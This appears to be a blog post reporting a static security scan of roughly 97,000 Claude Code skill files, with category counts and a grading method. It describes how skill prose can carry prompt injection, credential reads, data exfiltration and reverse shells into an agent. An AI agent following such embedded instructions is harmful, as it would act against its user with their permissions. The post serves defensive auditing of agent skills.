We scanned 97,000 Claude Code skills for security risks
A Claude Code skill is just a Markdown file — but its instructions run inside your agent, with your permissions. So we ran a static security scan over all 97,633 skills in the catalog, grading each against the ten threat categories of the OWASP Agentic Skills Top 10. The headline is good news: the open SKILL.md corpus is overwhelmingly clean.
The full breakdown
Each skill was scanned for ten categories of risk pattern. A skill can trigger more than one, so the percentages below sum to more than the ~8% of skills that have any finding. Here's every category across the whole catalog:
| Threat category | Skills | Share | Reading |
|---|---|---|---|
| Filesystem ops | 3,637 | 3.7% | Mostly benign — writing files is ordinary work |
| Network references | 2,145 | 2.2% | Hardcoded IPs/URLs; low severity |
| Supply chain | 932 | 1.0% | Mostly curl … | sh install lines |
| Execution | 813 | 0.8% | eval/subprocess/os.system |
| Obfuscation | 341 | 0.3% | Base64/hex — often legitimate encoding |
| Persistence | 317 | 0.3% | Cron / launchctl / shell-rc writes |
| Prompt injection | 146 | 0.1% | Instruction-override / jailbreak framing |
| Credentials | 140 | 0.1% | SSH / AWS / keychain reads |
| Data exfiltration | 98 | 0.1% | Secret-source read piped to network |
| Reverse shell | 11 | 0.01% | The genuinely scary one |
The pattern: scary categories are vanishingly rare
The two biggest categories — filesystem and network — are the least alarming. A skill that writes a config file or references an API endpoint is doing exactly what skills are for. The categories that genuinely matter — reverse shells, data exfiltration, credential reads — sit at the very bottom of the table, together accounting for fewer than 250 skills out of 97,633. The danger in the agent-skill ecosystem is real, but in the open corpus it is concentrated in a tiny tail, not spread across the catalog.
Prose vs. code fences: the insight that shaped the grade
An early version of the scan over-flagged. The reason: a security skill that documents a reverse shell inside a ``` code fence (as an example of what to detect) is not dangerous — but a skill whose prose instructs the agent to open one is. The agent acts on the prose; the fence is illustration. So the grader penalises a pattern inside a code fence at half weight. That single distinction moved hundreds of defensive-security and CTF skills out of the false-positive bucket and is the main reason the final numbers are trustworthy rather than alarmist.
The 31 Criticals
Thirty-one skills carry a Critical-severity pattern in their prose — a reverse shell, an environment dump piped to a URL, or a read of ~/.ssh sent outbound. Some are legitimate red-team and detection-engineering skills whose job is to discuss these exact techniques; others warrant a closer look. They're being hand-reviewed before any are gated out of the one-click install client — a static scan flags candidates, a human makes the call. Every one of them is still browsable, and every one shows its grade openly so you can judge for yourself.
Methodology & reproducibility
The scanner is a pure static pass over each skill's SKILL.md — no network, no execution. Rules are regular-expression patterns grouped into the ten categories above, each tagged with a severity (Critical −25 / High −15 / Medium −8 / Low −3) and a confidence level. Penalties are halved inside code fences and halved again for low-confidence rules, summed, and subtracted from a starting score of 100; the result maps to A–F. Full methodology, including the grade scale and the honest limits of static analysis, lives at claudskills.com/security/. Every grade is published on its skill page and in the open dataset (CC BY 4.0), so the figures in this article are independently reproducible. Counts reflect the catalog as of 2026-06-12 and shift slightly as the catalog grows.
FAQ
- How many Claude Code skills have security risks?
- Of 97,633 scanned, 92.1% were completely clean and 99.6% earned an A. Only 31 (0.03%) had a Critical pattern; 1,168 (1.2%) had a High pattern, most commonly a
curl … | shinstall line. - What was the most common finding?
- Filesystem operations (3.7%) and network references (2.2%) — both mostly benign. The dangerous categories (reverse shells, exfiltration, credential reads) are at the bottom of the table.
- Is the open corpus safer than other registries?
- On these numbers, substantially. Low-barrier registries studied in 2026 showed unsafe patterns in ~a third of listings; the curated open corpus shows 92% completely clean.
- Can I see the grade before installing?
- Yes — a free A–F grade sits next to every skill's title. Methodology at /security/.